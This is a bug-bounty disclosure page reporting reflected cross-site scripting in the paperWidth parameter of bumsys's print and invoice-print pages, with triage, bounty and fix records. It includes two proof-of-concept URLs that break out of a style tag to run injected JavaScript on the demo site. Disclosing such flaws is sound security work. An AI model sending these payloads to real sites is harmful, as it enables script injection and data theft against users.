Improper Neutralization of Input in paperWidth param During Web Page Generation in unilogies/bumsys

Valid

Reported on

Feb 22nd 2023


Module : print and invoice-print Parameter : paperWidth

Attacker would be able to close the <style> tag and can inject html tags

POC : http://demo.bumsys.org/print?&paperWidth=;}%3C/style%3E%3Cbody+onpageshow=alert(document.domain)%3E POC : http://demo.bumsys.org/invoice-print/?&paperWidth=;}%3C/style%3E%3Cbody+onpageshow=alert(document.domain)%3E&msg=%3Ca%3E

Impact

It could lead to steal data using javascript execution.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Khurshid Alam validated this vulnerability a year ago
mukundbhuva has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in v2.0.1 with commit 927214 a year ago
Khurshid Alam has been awarded the fix bounty
This vulnerability has now been published a year ago
to join this conversation